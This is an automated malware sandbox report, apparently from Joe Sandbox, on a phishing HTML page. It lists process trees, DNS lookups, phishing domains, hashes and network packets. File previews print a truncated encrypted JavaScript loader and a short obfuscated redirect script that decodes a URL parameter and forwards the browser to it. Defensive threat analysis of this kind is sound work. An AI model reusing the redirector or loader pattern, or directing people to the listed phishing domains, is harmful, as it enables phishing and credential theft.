Windows Analysis Report
https://ucarecdn.com/6e80a848-4922-47e6-9a12-2e73d2540050/8ff754f5-7513-4298-9573-17aa31ff5b5c.html

Overview

General Information

Sample URL: https://ucarecdn.com/6e80a848-4922-47e6-9a12-2e73d2540050/8ff754f5-7513-4298-9573-17aa31ff5b5c.html
Analysis ID: 1662266

Detection

Score: 52
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus detection for URL or domain
AI detected suspicious Javascript
Creates files inside the system directory
Deletes files inside the Windows folder

Classification

[Classification chart. Categories: Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner. Scale: clean, suspicious, malicious.]
  • System is w10x64
  • chrome.exe (PID: 3976 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 4840 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2332,i,1114976431534499065,153738974873917783,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2384 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • chrome.exe (PID: 7040 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://ucarecdn.com/6e80a848-4922-47e6-9a12-2e73d2540050/8ff754f5-7513-4298-9573-17aa31ff5b5c.html" MD5: E81F54E6C1129887AEA47E7D092680BF)
  • chrome.exe (PID: 3256 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 6120 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --metrics-shmem-handle=1948,i,2868179512277568459,14568565378952564348,524288 --field-trial-handle=2028,i,3787505417702600662,9503551255279435640,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=2072 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • chrome.exe (PID: 2692 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Downloads\8ff754f5-7513-4298-9573-17aa31ff5b5c.html" MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

AV Detection

Source: https://microsoftonelineda48b13627.cometlogistics.co.uk/?_da48b13627=bnBkL2lkZnVvZmVtcGhuYmlic2hBaHNmY3ZzYiRpcTBmZS9mbWpnZWZzYml0ZWJwbW94cGUwMDt0cXV1aQ, Avira URL Cloud: Label: phishing

Phishing

Source: 0.0..script.csv, Joe Sandbox AI: Detected suspicious JavaScript with source url: file:///C:/Users/user/Downloads/8ff754f5-7513-... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and the use of obfuscated code/URLs. The script decrypts and executes a potentially malicious payload, which poses a significant security risk. Additionally, the script interacts with unknown domains, further increasing the likelihood of malicious intent. Overall, this script exhibits a high level of suspicion and should be treated as a high-risk security threat.
Source: 1.3..script.csv, Joe Sandbox AI: Detected suspicious JavaScript with source url: https://da48b13627.vk.com@microsoftonelineda48b136... This script demonstrates several high-risk behaviors, including dynamic code execution, obfuscated URLs, and potential data exfiltration. The use of `atob`, string reversal, and character code manipulation to decode a URL suggests malicious intent. Additionally, the script attempts to redirect the user to the decoded URL, which could lead to a phishing or malware attack. Overall, this script poses a significant security risk and should be treated with caution.
Source: 2.4..script.csv, Joe Sandbox AI: Detected suspicious JavaScript with source url: https://downloadsharedfile.de/ph... This script demonstrates several high-risk behaviors, including dynamic code execution via `eval()` and obfuscated code. It also appears to be attempting to set a persistent cookie with an expiration date in the future, which could be used for malicious purposes such as session hijacking or tracking. The script also checks for the presence of various browser automation and testing frameworks, which suggests it may be attempting to evade detection. Overall, this script exhibits a high degree of suspicious and potentially malicious behavior, and should be treated with caution.
Source: https://downloadsharedfile.de/ph#aruberg@grahamgoldentech.com, HTTP Parser: No favicon
Source: global traffic, DNS traffic detected: DNS query: www.google.com
Source: global traffic, DNS traffic detected: DNS query: ucarecdn.com
Source: global traffic, DNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global traffic, DNS traffic detected: DNS query: 33vh88.perthshiregardenrooms.co.uk
Source: global traffic, DNS traffic detected: DNS query: microsoftonelineda48b13627.cometlogistics.co.uk
Source: global traffic, DNS traffic detected: DNS query: downloadsharedfile.de
Source: 730862d1-2f7c-46c2-beaf-1f87665d08e6.tmp.1.dr, chromecache_159.3.dr, String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
Source: C:\Program Files\Google\Chrome\Application\chrome.exe, File created: C:\Windows\SystemTemp\scoped_dir3976_755209614
Source: C:\Program Files\Google\Chrome\Application\chrome.exe, File created: C:\Windows\SystemTemp\scoped_dir3256_1208867069
Source: C:\Program Files\Google\Chrome\Application\chrome.exe, File deleted: C:\Windows\SystemTemp\scoped_dir3976_755209614
Source: C:\Program Files\Google\Chrome\Application\chrome.exe, File deleted: C:\Windows\SystemTemp\scoped_dir3256_1208867069
Source: classification engine, Classification label: mal52.win@51/13@20/7
Source: C:\Program Files\Google\Chrome\Application\chrome.exe, File created: C:\Users\user\Downloads\730862d1-2f7c-46c2-beaf-1f87665d08e6.tmp
Source: unknown, Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe, Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2332,i,1114976431534499065,153738974873917783,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2384 /prefetch:3
Source: unknown, Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://ucarecdn.com/6e80a848-4922-47e6-9a12-2e73d2540050/8ff754f5-7513-4298-9573-17aa31ff5b5c.html"
Source: unknown, Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe, Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --metrics-shmem-handle=1948,i,2868179512277568459,14568565378952564348,524288 --field-trial-handle=2028,i,3787505417702600662,9503551255279435640,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=2072 /prefetch:3
Source: unknown, Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Downloads\8ff754f5-7513-4298-9573-17aa31ff5b5c.html"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2332,i,1114976431534499065,153738974873917783,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2384 /prefetch:3Jump to behavior
Source: Window Recorder | Window detected: More than 3 window changes detected
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 Browser Extensions | 1 Process Injection | 11 Masquerading | OS Credential Dumping | System Service Discovery | Remote Services | Data from Local System | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 1 Process Injection | LSASS Memory | Application Window Discovery | Remote Desktop Protocol | Data from Removable Media | 4 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 File Deletion | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | 5 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Binary Padding | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | 3 Ingress Tool Transfer | Traffic Duplication | Data Destruction
[Behavior graph (image not preserved). Behavior Graph ID: 1662266; URL: https://ucarecdn.com/6e80a8...; Startdate: 10/04/2025; Architecture: WINDOWS; Score: 52. Signatures: Antivirus detection for URL or domain; AI detected suspicious Javascript. Nodes: four top-level chrome.exe processes, two of which started a child chrome.exe; DNS/IP nodes 192.168.2.6, 192.168.2.5, www.google.com (142.251.35.164, GOOGLEUS, United States), ucarecdn.com (151.101.130.132, FASTLYUS, United States), 33vh88.perthshiregardenrooms.co.uk, and 4 other IPs or domains.]

Source | Detection | Scanner | Label | Link
https://ucarecdn.com/6e80a848-4922-47e6-9a12-2e73d2540050/8ff754f5-7513-4298-9573-17aa31ff5b5c.html | 0% | Avira URL Cloud | safe |
No Antivirus matches
Source | Detection | Scanner | Label | Link
https://33vh88.perthshiregardenrooms.co.uk/aruberg@grahamgoldentech.com | 0% | Avira URL Cloud | safe |
https://downloadsharedfile.de/favicon.ico | 0% | Avira URL Cloud | safe |
https://downloadsharedfile.de/ph | 0% | Avira URL Cloud | safe |
https://microsoftonelineda48b13627.cometlogistics.co.uk/?_da48b13627=bnBkL2lkZnVvZmVtcGhuYmlic2hBaHNmY3ZzYiRpcTBmZS9mbWpnZWZzYml0ZWJwbW94cGUwMDt0cXV1aQ | 100% | Avira URL Cloud | phishing |


Name | IP | Active | Malicious | Antivirus Detection | Reputation
cdnjs.cloudflare.com | 104.17.24.14 | true | false | | high
33vh88.perthshiregardenrooms.co.uk | 167.172.166.226 | true | false | | unknown
microsoftonelineda48b13627.cometlogistics.co.uk | 167.172.166.226 | true | false | | unknown
downloadsharedfile.de | 104.21.7.120 | true | false | | high
www.google.com | 142.251.35.164 | true | false | | high
ucarecdn.com | 151.101.130.132 | true | false | | high
Name | Malicious | Antivirus Detection | Reputation
https://ucarecdn.com/6e80a848-4922-47e6-9a12-2e73d2540050/8ff754f5-7513-4298-9573-17aa31ff5b5c.html | false | | high
http://c.pki.goog/r/gsr1.crl | false | | high
http://c.pki.goog/r/r4.crl | false | | high
https://33vh88.perthshiregardenrooms.co.uk/aruberg@grahamgoldentech.com | false | Avira URL Cloud: safe | unknown
https://downloadsharedfile.de/ph | true | Avira URL Cloud: safe | unknown
https://downloadsharedfile.de/favicon.ico | false | Avira URL Cloud: safe | unknown
https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js | false | | high
https://microsoftonelineda48b13627.cometlogistics.co.uk/?_da48b13627=bnBkL2lkZnVvZmVtcGhuYmlic2hBaHNmY3ZzYiRpcTBmZS9mbWpnZWZzYml0ZWJwbW94cGUwMDt0cXV1aQ | false | Avira URL Cloud: phishing | unknown
https://downloadsharedfile.de/ph#aruberg@grahamgoldentech.com | false | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
104.17.24.14 | cdnjs.cloudflare.com | United States | 13335 | CLOUDFLARENETUS | false
104.21.7.120 | downloadsharedfile.de | United States | 13335 | CLOUDFLARENETUS | false
151.101.130.132 | ucarecdn.com | United States | 54113 | FASTLYUS | false
167.172.166.226 | 33vh88.perthshiregardenrooms.co.uk | United States | 14061 | DIGITALOCEAN-ASNUS | false
142.251.35.164 | www.google.com | United States | 15169 | GOOGLEUS | false
                        IP
                        192.168.2.6
                        192.168.2.5
                        Joe Sandbox version:42.0.0 Malachite
                        Analysis ID:1662266
                        Start date and time:2025-04-10 19:20:04 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 4m 35s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:browseurl.jbs
                        Sample URL:https://ucarecdn.com/6e80a848-4922-47e6-9a12-2e73d2540050/8ff754f5-7513-4298-9573-17aa31ff5b5c.html
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:20
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal52.win@51/13@20/7
                        EGA Information:Failed
                        HCA Information:
                        • Successful, ratio: 100%
                        • Number of executed functions: 0
                        • Number of non-executed functions: 0
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe, TextInputHost.exe
                        • Excluded IPs from analysis (whitelisted): 142.251.35.163, 142.250.80.46, 142.250.31.84, 172.217.165.142, 23.53.11.13, 142.251.32.99, 23.9.183.29, 172.202.163.200
                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, accounts.google.com, redirector.gvt1.com, slscr.update.microsoft.com, update.googleapis.com, ctldl.windowsupdate.com, clientservices.googleapis.com, clients.l.google.com, c.pki.goog, fe3cr.delivery.mp.microsoft.com
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size getting too big, too many NtCreateFile calls found.
                        • Report size getting too big, too many NtOpenFile calls found.
                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                        • VT rate limit hit for: https://ucarecdn.com/6e80a848-4922-47e6-9a12-2e73d2540050/8ff754f5-7513-4298-9573-17aa31ff5b5c.html
                        No simulations
                        No context
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:HTML document, ASCII text, with very long lines (455)
                        Category:dropped
                        Size (bytes):1872
                        Entropy (8bit):5.391436007943997
                        Encrypted:false
                        SSDEEP:24:hU2CDf0tNVO73DHk3vo/ScHAHnQPnjaxu0WY7agH96P71N9dXHSUtW2seFtlBa7M:EMYk3vgHVN0WY+gHcpVBseblkiz
                        MD5:EB64D302C3E2871C4707F72637527FB5
                        SHA1:3469AC20B615D7F02CBA53794486F4D9B0E2C04F
                        SHA-256:8642BE05FDFC09717B79493BDE6FE6FB03760BBC76F9AFDD35B6184EE81381C5
                        SHA-512:AEA41118CD1B165AB3A8CE253BF47ABFE11D68B8FDA090B44D82C2AA350762AEBD9354CE0773A83CBE45D86068A5A1EE3B4A9250998914F9B962B9ED816500B9
                        Malicious:false
                        Reputation:low
                        Preview:<!DOCTYPE html>. <html lang="en">. <head>. <meta charset="UTF-8">. <meta name="viewport" content="width=device-width, initial-scale=1.0">. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js"></script>. </head>. I find that the harder I work, the more luck I seem to have. -->. <script>. async function main() {. const xmvlumjb = Uint8Array.from(atob('F6j4mWE40gzeWhnZK1IvEEXHeV+M+wfqahVJCsghnJM='), c => c.charCodeAt(0));. const hkkfiiec = Uint8Array.from(atob('mIDrUBCYEQ3Vp6hB'), c => c.charCodeAt(0));. const IS = new Uint8Array([...atob('w3EK10c92Nk1hdqfUndYsv+uw+wm0rgj/T3jEoGty3rZyGrIuxKAfpT1XkMbyTf53Xfvr6zZNv7ZeGwxxdJ5XHkrJkEz8zf2tJGCqYvXoB0vg/Z7EyPykqafmp87K4OuC+xyG0sxi+Vf05uwCB7PHyzK9wyyiVHbC1Y6RBuuEWqWdZKg4O78lEu+nG+QTsESx/x6tZYOMv5qmDEOjmvJ34iDq0ULdDg2XNakCDc1qES2GScf4uRZetdY6vySrxE6GnhM9otf4IuhKP9brGfikmCggdMxtoqZ4LP55yaph0gFqQP2mqHavBaysaaLjuzmN/mWVj0iC59moJ1HLbQMbJe
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:HTML document, ASCII text, with very long lines (455)
                        Category:downloaded
                        Size (bytes):1872
                        Entropy (8bit):5.391436007943997
                        Encrypted:false
                        SSDEEP:24:hU2CDf0tNVO73DHk3vo/ScHAHnQPnjaxu0WY7agH96P71N9dXHSUtW2seFtlBa7M:EMYk3vgHVN0WY+gHcpVBseblkiz
                        MD5:EB64D302C3E2871C4707F72637527FB5
                        SHA1:3469AC20B615D7F02CBA53794486F4D9B0E2C04F
                        SHA-256:8642BE05FDFC09717B79493BDE6FE6FB03760BBC76F9AFDD35B6184EE81381C5
                        SHA-512:AEA41118CD1B165AB3A8CE253BF47ABFE11D68B8FDA090B44D82C2AA350762AEBD9354CE0773A83CBE45D86068A5A1EE3B4A9250998914F9B962B9ED816500B9
                        Malicious:false
                        Reputation:low
                        URL:https://ucarecdn.com/6e80a848-4922-47e6-9a12-2e73d2540050/8ff754f5-7513-4298-9573-17aa31ff5b5c.html
                        Preview:<!DOCTYPE html>. <html lang="en">. <head>. <meta charset="UTF-8">. <meta name="viewport" content="width=device-width, initial-scale=1.0">. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js"></script>. </head>. I find that the harder I work, the more luck I seem to have. -->. <script>. async function main() {. const xmvlumjb = Uint8Array.from(atob('F6j4mWE40gzeWhnZK1IvEEXHeV+M+wfqahVJCsghnJM='), c => c.charCodeAt(0));. const hkkfiiec = Uint8Array.from(atob('mIDrUBCYEQ3Vp6hB'), c => c.charCodeAt(0));. const IS = new Uint8Array([...atob('w3EK10c92Nk1hdqfUndYsv+uw+wm0rgj/T3jEoGty3rZyGrIuxKAfpT1XkMbyTf53Xfvr6zZNv7ZeGwxxdJ5XHkrJkEz8zf2tJGCqYvXoB0vg/Z7EyPykqafmp87K4OuC+xyG0sxi+Vf05uwCB7PHyzK9wyyiVHbC1Y6RBuuEWqWdZKg4O78lEu+nG+QTsESx/x6tZYOMv5qmDEOjmvJ34iDq0ULdDg2XNakCDc1qES2GScf4uRZetdY6vySrxE6GnhM9otf4IuhKP9brGfikmCggdMxtoqZ4LP55yaph0gFqQP2mqHavBaysaaLjuzmN/mWVj0iC59moJ1HLbQMbJe
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:HTML document, ASCII text
                        Category:downloaded
                        Size (bytes):315
                        Entropy (8bit):5.0572271090563765
                        Encrypted:false
                        SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezoFEHcLgabzjsKtgsg93wzRbKqD:J0+oxBeRmR9etdzRxGezZfCzjsKtgizR
                        MD5:A34AC19F4AFAE63ADC5D2F7BC970C07F
                        SHA1:A82190FC530C265AA40A045C21770D967F4767B8
                        SHA-256:D5A89E26BEAE0BC03AD18A0B0D1D3D75F87C32047879D25DA11970CB5C4662A3
                        SHA-512:42E53D96E5961E95B7A984D9C9778A1D3BD8EE0C87B8B3B515FA31F67C2D073C8565AFC2F4B962C43668C4EFA1E478DA9BB0ECFFA79479C7E880731BC4C55765
                        Malicious:false
                        Reputation:low
                        URL:https://downloadsharedfile.de/favicon.ico
                        Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>.
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:ASCII text, with very long lines (48316), with no line terminators
                        Category:downloaded
                        Size (bytes):48316
                        Entropy (8bit):5.6346993394709
                        Encrypted:false
                        SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                        MD5:2CA03AD87885AB983541092B87ADB299
                        SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                        SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                        SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                        Malicious:false
                        Reputation:low
                        URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                        Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:HTML document, ASCII text
                        Category:downloaded
                        Size (bytes):351
                        Entropy (8bit):5.210005812732593
                        Encrypted:false
                        SSDEEP:6:hxuJ9xVgY2pCXLx95VV4nJEx/QNH3BY2GRGRNHF59fHIBijASPska5HcTT4EINwu:hYzxVyCbxT4nJEx/QN/GRGr/ZVvPFoH7
                        MD5:30E324B6B6FB6C7F1BAF9A321122EFDE
                        SHA1:DCCD1AFE93AF7A0366E9D8D3E5AEC85F66D80C11
                        SHA-256:7D03AD51CBEB4A39811F4BB50DDE97159CADD58D665FF81B70B6D2AF65B324D6
                        SHA-512:9E5BD04748A93A22821BE03C6F404F85E71C65B855D910A888FF2CAB89863E169DB209A8E0FFC256D628A17DB53F88FDD34CC87B79BBBF0C4C47AF3AF3116D4D
                        Malicious:false
                        Reputation:low
                        URL:https://microsoftonelineda48b13627.cometlogistics.co.uk/?_da48b13627=bnBkL2lkZnVvZmVtcGhuYmlic2hBaHNmY3ZzYiRpcTBmZS9mbWpnZWZzYml0ZWJwbW94cGUwMDt0cXV1aQ
                        Preview:<!DOCTYPE html>.<html><head><meta charset="UTF-8"><title></title></head>.<body><script>.!function(){try{var b=atob(location.search.slice(1).split("=")[1]);.var d=decodeURIComponent(b.split("").reverse().join(""))..split("").map(c=>String.fromCharCode(c.charCodeAt(0)-1)).join("");.new URL(d)&&location.replace(d)}catch(e){}}();.</script></body></html>
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:HTML document, ASCII text
                        Category:downloaded
                        Size (bytes):320
                        Entropy (8bit):5.03433046230283
                        Encrypted:false
                        SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezoFEHcLgabzjsKtgsg93wzRbKq7n:J0+oxBeRmR9etdzRxGezZfCzjsKtgiz5
                        MD5:9682400222EF22EC53C861B45F6B815A
                        SHA1:A285541B20F9A285A3C2EB45309020C7793ECB81
                        SHA-256:18B4FCEA2EC57CCD4341051EF8945F2085B0F0258C73BD9716F4B8010B8B2804
                        SHA-512:5971A09B0A76E414D7DDB985E75B47AC3918823153C0D35DA52A9EE8C2A715C0EB9A8B64F9A0609CB5FB6E8003DD22F750CEF93EAF3C47D788C5039504E2C505
                        Malicious:false
                        Reputation:low
                        URL:https://downloadsharedfile.de/ph
                        Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>. .
                        No static file info
                        Icon Hash:00b29a8e86828200


                        • Total Packets: 227
                        • 443 (HTTPS)
                        • 80 (HTTP)
                        • 53 (DNS)
                        Apr 10, 2025 19:21:09.349498987 CEST49700443192.168.2.6104.17.24.14
                        Apr 10, 2025 19:21:09.350275993 CEST49700443192.168.2.6104.17.24.14
                        Apr 10, 2025 19:21:09.350286007 CEST44349700104.17.24.14192.168.2.6
                        Apr 10, 2025 19:21:09.542706013 CEST44349700104.17.24.14192.168.2.6
                        Apr 10, 2025 19:21:09.542778015 CEST49700443192.168.2.6104.17.24.14
                        Apr 10, 2025 19:21:09.544452906 CEST49700443192.168.2.6104.17.24.14
                        Apr 10, 2025 19:21:09.544460058 CEST44349700104.17.24.14192.168.2.6
                        Apr 10, 2025 19:21:09.544761896 CEST44349700104.17.24.14192.168.2.6
                        Apr 10, 2025 19:21:09.545017958 CEST49700443192.168.2.6104.17.24.14
                        Apr 10, 2025 19:21:09.592268944 CEST44349700104.17.24.14192.168.2.6
                        Apr 10, 2025 19:21:09.775202036 CEST44349700104.17.24.14192.168.2.6
                        Apr 10, 2025 19:21:09.775263071 CEST44349700104.17.24.14192.168.2.6
                        Apr 10, 2025 19:21:09.775295019 CEST44349700104.17.24.14192.168.2.6
                        Apr 10, 2025 19:21:09.775306940 CEST49700443192.168.2.6104.17.24.14
                        Apr 10, 2025 19:21:09.775321960 CEST44349700104.17.24.14192.168.2.6
                        Apr 10, 2025 19:21:09.775448084 CEST44349700104.17.24.14192.168.2.6
                        Apr 10, 2025 19:21:09.775480032 CEST44349700104.17.24.14192.168.2.6
                        Apr 10, 2025 19:21:09.775506020 CEST44349700104.17.24.14192.168.2.6
                        Apr 10, 2025 19:21:09.775515079 CEST49700443192.168.2.6104.17.24.14
                        Apr 10, 2025 19:21:09.775515079 CEST49700443192.168.2.6104.17.24.14
                        Apr 10, 2025 19:21:09.775523901 CEST44349700104.17.24.14192.168.2.6
                        Apr 10, 2025 19:21:09.775563002 CEST49700443192.168.2.6104.17.24.14
                        Apr 10, 2025 19:21:09.775571108 CEST44349700104.17.24.14192.168.2.6
                        Apr 10, 2025 19:21:09.776494026 CEST44349700104.17.24.14192.168.2.6
                        Apr 10, 2025 19:21:09.776535988 CEST44349700104.17.24.14192.168.2.6
                        Apr 10, 2025 19:21:09.776545048 CEST49700443192.168.2.6104.17.24.14
                        Apr 10, 2025 19:21:09.776557922 CEST44349700104.17.24.14192.168.2.6
                        Apr 10, 2025 19:21:09.776593924 CEST44349700104.17.24.14192.168.2.6
                        Apr 10, 2025 19:21:09.776647091 CEST49700443192.168.2.6104.17.24.14
                        Apr 10, 2025 19:21:09.776654005 CEST44349700104.17.24.14192.168.2.6
                        Apr 10, 2025 19:21:09.776736975 CEST49700443192.168.2.6104.17.24.14
                        Apr 10, 2025 19:21:09.777224064 CEST44349700104.17.24.14192.168.2.6
                        Apr 10, 2025 19:21:09.777273893 CEST44349700104.17.24.14192.168.2.6
                        Apr 10, 2025 19:21:09.777311087 CEST49700443192.168.2.6104.17.24.14
                        Apr 10, 2025 19:21:09.777318954 CEST44349700104.17.24.14192.168.2.6
                        Apr 10, 2025 19:21:09.777415991 CEST44349700104.17.24.14192.168.2.6
                        Apr 10, 2025 19:21:09.777483940 CEST49700443192.168.2.6104.17.24.14
                        Apr 10, 2025 19:21:09.777489901 CEST44349700104.17.24.14192.168.2.6
                        Apr 10, 2025 19:21:09.778208971 CEST44349700104.17.24.14192.168.2.6
                        Apr 10, 2025 19:21:09.778255939 CEST44349700104.17.24.14192.168.2.6
                        Apr 10, 2025 19:21:09.778275013 CEST49700443192.168.2.6104.17.24.14
                        Apr 10, 2025 19:21:09.778284073 CEST44349700104.17.24.14192.168.2.6
                        Apr 10, 2025 19:21:09.778316021 CEST44349700104.17.24.14192.168.2.6
                        Apr 10, 2025 19:21:09.778904915 CEST44349700104.17.24.14192.168.2.6
                        Apr 10, 2025 19:21:09.778955936 CEST49700443192.168.2.6104.17.24.14
                        Apr 10, 2025 19:21:09.778955936 CEST49700443192.168.2.6104.17.24.14
                        Apr 10, 2025 19:21:09.778963089 CEST44349700104.17.24.14192.168.2.6
                        Apr 10, 2025 19:21:09.778995991 CEST44349700104.17.24.14192.168.2.6
                        Apr 10, 2025 19:21:09.779052019 CEST44349700104.17.24.14192.168.2.6
                        Apr 10, 2025 19:21:09.779079914 CEST44349700104.17.24.14192.168.2.6
                        Apr 10, 2025 19:21:09.779118061 CEST49700443192.168.2.6104.17.24.14
                        Apr 10, 2025 19:21:09.779118061 CEST49700443192.168.2.6104.17.24.14
